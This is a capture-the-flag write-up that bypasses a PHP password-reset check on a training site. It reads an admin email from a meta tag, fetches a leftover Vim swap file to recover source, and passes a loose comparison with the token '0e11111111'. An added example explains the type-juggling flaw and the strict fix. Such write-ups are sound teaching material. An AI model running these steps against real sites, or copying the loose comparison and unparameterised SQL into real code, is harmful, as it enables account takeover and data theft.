First, some basic PHP knowledge, as follows:
PHP code:
<?php
$a=1e+3;
$b='1e3';
$c=1e-1;
var_dump($a);
var_dump($b);
var_dump($c);
?>
Output:
float(1000)
string(3) "1e3"
float(0.1)
PHP code:
<?php
$d='0e11111111';
if($d != '0'){
echo "no";
}
else {
echo "yes";
}
?>
Output:
yes
Solving the challenge
First, look at the page source of http://ctf5.shiyanbar.com/10/upload/step1.php:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
</head>
<body>
<form action="./step1.php" method="GET">
<h1>找回密码step1</h1>
input regist email:<input name="emailAddress" type="text" /></br>
<input type="submit" value="提交">
</form>
</body>
</html>
When we enter an email address and submit, inspect the response:
<script>alert("你邮箱收到的重置密码链接为 ./[email protected]&check=???????")</script> <title>logic</title>
So we move on to step2.php:
http://ctf5.shiyanbar.com/10/upload/[email protected]&check=12345
Inspecting the response, the page source contains a form that points at submit.php:
<form action="submit.php" method="GET">
<h1>找回密码step2</h1>
email:<input name="emailAddress" type="text" <br />
<b>Notice</b>: Use of undefined constant email - assumed 'email' in <b>C:\h43a1W3\phpstudy\WWW\10\upload\step2.php</b> on line <b>49</b><br />
value="[email protected]" disable="true"/></br>
token:<input name="token" type="text" /></br>
<input type="submit" value="提交">
</form>
Continue:
http://ctf5.shiyanbar.com/10/upload/[email protected]&token=123
The page shows: you are not an admin
Go back to the page source of step1.php and step2.php above:
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
So we put [email protected] in:
[email protected]&token=123
Now the page changes to fail.
So the problem is with the token. Look again at the earlier page source:
<meta name="editor" content="Vim" />
When the Vim editor exits abnormally it leaves behind a .submit.php.swp swap file, so request that file:
http://ctf5.shiyanbar.com/10/upload/.submit.php.swp
We obtain part of the code and start the code audit:
if(!empty($token)&&!empty($emailAddress)){
// token must be exactly 10 characters long
if(strlen($token)!=10) die('fail');
// loose (!=) comparison: numeric strings are compared as numbers, so a
// 10-character numeric string whose value is 0 passes this check
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){
echo $flag;
}else{
// (remainder of the file was not recovered from the swap file)
The token must be 10 characters long and must loosely equal '0', so we construct it as follows (refer back to the PHP basics section at the start):
token=0e11111111
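To make the PHP basics at the top and the recovered check concrete, here is an added example (not code from the original writeup or from the challenge) that reproduces the loose comparison and places a strict variant beside it; it assumes PHP 7 or later.

```php
<?php
// Added example: why `if($token!='0') die('fail');` accepts "0e11111111",
// and how a strict comparison closes the gap. Assumes PHP 7+; the
// numeric-string comparison shown behaves the same on PHP 8.

// Reproduces the logic recovered from the swap file: a length check plus
// a loose (!=) comparison against '0'.
function looseTokenCheck(string $token): bool {
    if (strlen($token) != 10) return false;
    // Both operands are numeric strings, so PHP compares them as numbers:
    // "0e11111111" evaluates to 0.0 and "0" to 0, hence they are "equal".
    if ($token != '0') return false;
    return true;
}

// Hardened variant: !== compares type and bytes, never numeric value.
// Combined with the 10-character length requirement, no input passes,
// which is what the original check was evidently meant to enforce.
function strictTokenCheck(string $token): bool {
    if (strlen($token) !== 10) return false;
    if ($token !== '0') return false;
    return true;
}

// Constructed inputs: the scientific-notation zero from the writeup,
// a string of ten zeros, a non-zero token, and a too-short token.
$cases = ['0e11111111', '0000000000', '1234567890', '0'];
foreach ($cases as $t) {
    printf("%-11s loose=%-5s strict=%s\n", $t,
        looseTokenCheck($t) ? 'pass' : 'fail',
        strictTokenCheck($t) ? 'pass' : 'fail');
}
```

The recovered code also interpolates $token and $emailAddress straight into the SQL string; a prepared statement is the matching fix for that line.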
Final payload:
[email protected]&token=0e11111111
We successfully get the flag:
flag is SimCTF{*******}
When submitting, read the task statement carefully:
Format: SimCTF{ }